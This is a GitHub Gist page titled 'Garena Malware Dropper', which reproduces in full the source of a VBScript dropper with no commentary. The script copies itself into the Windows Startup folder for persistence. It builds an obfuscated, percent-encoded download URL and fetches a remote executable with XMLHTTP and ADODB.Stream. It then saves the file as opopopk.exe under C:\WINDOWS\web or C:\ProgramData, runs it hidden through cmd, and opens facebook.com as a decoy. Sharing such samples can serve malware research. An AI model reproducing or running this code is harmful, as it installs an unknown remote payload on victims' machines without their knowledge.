Created
March 3, 2018 10:56
-
-
Save aaaddress1/7251e0a6c8be451ddad030f2dde9642b to your computer and use it in GitHub Desktop.
Garena Malware Dropper (2018/03/03)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Dim Wsh | |
Set Wsh = Wscript.CreateObject("Wscript.Shell") | |
Dim Objectfs | |
Set Objectfs = CreateObject("Scripting.FileSystemObject") | |
set fso = createobject("scripting.filesystemobject") | |
set ws = createobject("wscript.shell") | |
pt = ws.specialfolders("startup") & "\" | |
set file = fso.getfile(wscript.scriptfullname) | |
If Objectfs.FileExists(pt & "r.vbe") Then | |
else | |
set fso = createobject("scripting.filesystemobject") | |
set ws = createobject("wscript.shell") | |
pt = ws.specialfolders("startup") & "\" | |
set file = fso.getfile(wscript.scriptfullname) | |
file.copy pt | |
Set fs2=fso.GetFile(pt & file.name) | |
fs2.Name="r.vbe" | |
End if | |
a="c:\programdata\" | |
set fso=createobject("scripting.filesystemobject") | |
str="\" | |
getpath=split(a,str) | |
for i= 1 to ubound(getpath) | |
path=path & str &getpath(i) | |
if not fso.folderexists(getpath(0)& str &path)then | |
fso.createfolder(getpath(0)& str &path) | |
end if | |
next | |
On Error Resume Next | |
strComputer = "." | |
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") | |
Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48) | |
For Each objItem in colItems | |
strVer = objItem.Caption | |
Next | |
If InStr(1, strVer, "XP") <> 0 Then | |
on error resume next | |
uiUIGYurufUYFTY=".xMlH" | |
IOHgytufTUIGUIio="t.ShElL" | |
tyfyfdrtDRETyuTYFTYdrt="tre" | |
Set UIyugFTR6Ty=CreateObject("Wscrip"+IOHgytufTUIGUIio) | |
Set GYUGutfRTFRdtgtyg = CreateObject("MsxMl2"+uiUIGYurufUYFTY+"Ttp") | |
Set HYUgrdRTESwswect=CreateObject("ADODB.S"+tyfyfdrtDRETyuTYFTYdrt+"am") | |
ffrTDERerser="http:" | |
hyuTYFtybYDT="//" | |
UJIhufFYVyvhbJNhijn="%7" | |
ht="GET" | |
JUIyugvfYVFTvh="%6" | |
tTYrtg="A"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn+"A%31%32%33%2E"+UJIhufFYVyvhbJNhijn+"5"+UJIhufFYVyvhbJNhijn+"3" | |
SsSfesds=UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7%2E"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn | |
OUgtydRT=JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"D"+JUIyugvfYVFTvh+"1"+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"5"+UJIhufFYVyvhbJNhijn+"3." | |
tUIhyug=JUIyugvfYVFTvh+"1%2E"+JUIyugvfYVFTvh+"3"+JUIyugvfYVFTvh+"3/" | |
com="web" | |
ghidw="WINDOWS" | |
tyFRTDR=+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"6" | |
abve=" /c " | |
cbve="C:\" | |
GYUGutfRTFRdtgtyg.Open ht,ffrTDERerser+hyuTYFtybYDT+SsSfesds+tTYrtg+tUIhyug+OUgtydRT+tyFRTDR,0 | |
GYUGutfRTFRdtgtyg.Send() | |
HYUgrdRTESwswect.Mode=3 | |
HYUgrdRTESwswect.Type=1 | |
HYUgrdRTESwswect.Open() | |
HYUgrdRTESwswect.Write(GYUGutfRTFRdtgtyg.responseBody) | |
tf="\" | |
ewisiw="set &&ping -n 10" | |
SM32=cbve+ghidw+tf+com+tf+"opopopk.exe" | |
HYUgrdRTESwswect.sAVetOFiLe SM32 | |
eiqq="cmd" | |
mhg=eiqq+abve+ewisiw+" 127.0.0.1 &&start "+SM32 | |
UIyugFTR6Ty.run (mhg),0 | |
else | |
on error resume next | |
uiUIGYurufUYFTY=".xMlH" | |
IOHgytufTUIGUIio="t.ShElL" | |
tyfyfdrtDRETyuTYFTYdrt="tre" | |
Set UIyugFTR6Ty=CreateObject("Wscrip"+IOHgytufTUIGUIio) | |
Set GYUGutfRTFRdtgtyg = CreateObject("MsxMl2"+uiUIGYurufUYFTY+"Ttp") | |
Set HYUgrdRTESwswect=CreateObject("ADODB.S"+tyfyfdrtDRETyuTYFTYdrt+"am") | |
ffrTDERerser="http:" | |
hyuTYFtybYDT="//" | |
UJIhufFYVyvhbJNhijn="%7" | |
ht="GET" | |
JUIyugvfYVFTvh="%6" | |
tTYrtg="A"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn+"A%31%32%33%2E"+UJIhufFYVyvhbJNhijn+"5"+UJIhufFYVyvhbJNhijn+"3" | |
SsSfesds=UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7%2E"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn | |
OUgtydRT=JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"D"+JUIyugvfYVFTvh+"1"+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"5"+UJIhufFYVyvhbJNhijn+"3." | |
tUIhyug=JUIyugvfYVFTvh+"1%2E"+JUIyugvfYVFTvh+"3"+JUIyugvfYVFTvh+"3/" | |
ghidw="ProgramData" | |
tyFRTDR=+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"6" | |
abve=" /c " | |
cbve="C:\" | |
GYUGutfRTFRdtgtyg.Open ht,ffrTDERerser+hyuTYFtybYDT+SsSfesds+tTYrtg+tUIhyug+OUgtydRT+tyFRTDR,0 | |
GYUGutfRTFRdtgtyg.Send() | |
HYUgrdRTESwswect.Mode=3 | |
HYUgrdRTESwswect.Type=1 | |
HYUgrdRTESwswect.Open() | |
HYUgrdRTESwswect.Write(GYUGutfRTFRdtgtyg.responseBody) | |
tf="\" | |
ewisiw="set &&ping -n 10" | |
SM32=cbve+ghidw+tf+"opopopk.exe" | |
HYUgrdRTESwswect.sAVetOFiLe SM32 | |
eiqq="cmd" | |
mhg=eiqq+abve+ewisiw+" 127.0.0.1 &&start "+SM32 | |
UIyugFTR6Ty.run (mhg),0 | |
End If | |
Set objShell = CreateObject("Wscript.Shell") | |
objShell.Run("http://www.facebook.com") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment